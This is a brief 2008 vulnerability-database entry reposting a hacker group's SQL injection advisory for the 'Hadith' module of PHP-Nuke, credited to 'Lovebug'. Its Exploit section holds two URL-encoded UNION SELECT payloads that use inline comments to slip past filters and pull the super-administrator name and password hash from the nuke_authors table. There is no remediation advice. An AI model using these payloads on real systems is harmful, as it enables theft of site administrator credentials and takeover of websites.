PHP-Nuke SQL injection Module "Hadith" [cat]

2008-03-10T00:00:00
ID SECURITYVULNS:DOC:19367
Type securityvulns
Reporter Securityvulns
Modified 2008-03-10T00:00:00

Description

R B T - 4 C R E W www.rbt-4.net


AUTHOR : Lovebug

PHP-Nuke Module "Hadith" [cat] Sql injection

Original Advisory: http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3078

Exploit

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A